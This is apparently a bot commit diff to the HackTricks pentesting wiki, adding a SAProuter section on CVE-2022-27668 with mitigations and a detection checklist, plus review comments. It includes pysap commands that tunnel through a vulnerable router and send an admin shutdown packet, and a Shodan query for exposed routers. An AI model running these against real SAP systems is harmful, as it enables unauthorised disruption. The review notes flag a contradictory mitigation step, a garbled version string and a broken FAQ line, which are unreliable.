Add content from: Research Update: Enhanced src/network-services-pentesting/32...

This commit is contained in:
HackTricks News Bot 2025-08-09 08:24:52 +00:00
parent f09a9494a9
commit 6a1805a247
2 changed files with 64 additions and 5 deletions

View File

@ -71,15 +71,75 @@ This approach underscores the importance of secure SAProuter configurations and
For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db).
---
## Recent Vulnerabilities (2022-2025)
### CVE-2022-27668 Improper Access Control ➜ Remote Administrative Command Execution
In June 2022 SAP released Security Note **3158375** addressing a critical flaw (CVSS 9.8) in SAProuter (all kernels ≥ 7.22). An unauthenticated attacker can abuse permissive `saprouttab` entries to **send administration packets** (e.g. *shutdown*, *trace-level*, *connection-kill*) from a remote host, even when the router was started without the `-X` remote-admin option.
The issue results from the possibility to build a tunnel to the routers own loopback interface by targeting the unspecified address **0.0.0.0**. Once the tunnel is established, the attacker gains local-host privileges and can run any admin command.
Practical exploitation can be reproduced with the **pysap** framework:
```bash
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
```
**Affected versions**
* Stand-alone SAProuter 7.22 / 7.53
* Kernel 7.49, 7.77, 7.81, 7.857.88 (incl. KRNL64NUC/UC)
**Fix / Mitigation**
1. Apply the patch delivered with SAP Note **3158375**.
2. Remove wildcard (`*`) targets from `P` and `S` lines in `saprouttab`.
3. Make sure the router is started **without** the `-X` option and is **not** directly exposed to the Internet.
---
## Updated Tooling & Tricks
* **pysap** actively maintained and provides `router_portfw.py`, `router_admin.py` & `router_trace.py` for crafting custom NI/Router packets, fuzzing ACLs or automating the CVE-2022-27668 exploit.
* **Nmap** extend service detection by adding the custom SAProuter probe:
```text
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
```
Combine with NSE scripts or `--script=banner` to quickly fingerprint versions that leak the banner string (`SAProuter <ver> on '<host>'`).
* **Metasploit** the auxiliary modules shown above still work through a SOCKS or NI proxy created with pysap, enabling full framework integration even when the router blocks direct access.
---
## Hardening & Detection Checklist
* Filter port **3299/TCP** on the perimeter firewall allow traffic only from trusted SAP support networks.
* Keep SAProuter **fully patched**; verify with `saprouter -v` and compare against the latest kernel patch level.
* Use **strict, host-specific** entries in `saprouttab`; avoid `*` wildcards and deny `P`/`S` rules that target arbitrary hosts or ports.
* Start the service with **`-S <secudir>` + SNC** to enforce encryption and mutual authentication.
* Disable remote administration (`-X`) and, if possible, bind the listener to `127.0.0.1` while using an external reverse proxy for required traffic.
* Monitor the **dev_rout** log for suspicious `ROUTER_ADM` packets or unexpected `NI_ROUTE` requests to `0.0.0.0`.
---
## **References**
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
## Shodan
- `port:3299 !HTTP Network packet too big`
{{#include ../banners/hacktricks-training.md}}
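Review bot: mitigation step 3 in this hunk ("Make sure the router is started **without** the `-X` option") contradicts the description two paragraphs earlier, which says the admin packets can be sent "even when the router was started without the `-X` remote-admin option"; either drop `-X` from the fix list or reword it as general hardening so that the patch (Note 3158375) and the `saprouttab` cleanup read as the actual remediation. In the affected-versions list, "7.857.88" has lost its separator and should be written out explicitly (two versions or a range, whichever the SAP note states), and "the routers own loopback interface" should be "the router's own loopback interface". The three bullets under "Updated Tooling & Tricks" and the first checklist item ("Filter port **3299/TCP** on the perimeter firewall allow traffic only from ...") have each lost the dash that separated the tool name or clause from its description, so they currently read as run-ons.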

View File

@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
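Review bot: the replacement line in this hunk drops the verb: "How can I a page of HackTricks?" is missing "cite", so the FAQ entry no longer asks a question; restore "How can I cite a page of HackTricks?" (the removed line was correct) unless a different wording was intended.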
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}}
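Review bot: the hunk header (-144,4 +144,3) records one line removed, but the rendered hunk shows only the banner include as context, so the deleted line is not visible here; confirm it is a trailing blank line and not part of the license text the header refers to before merging.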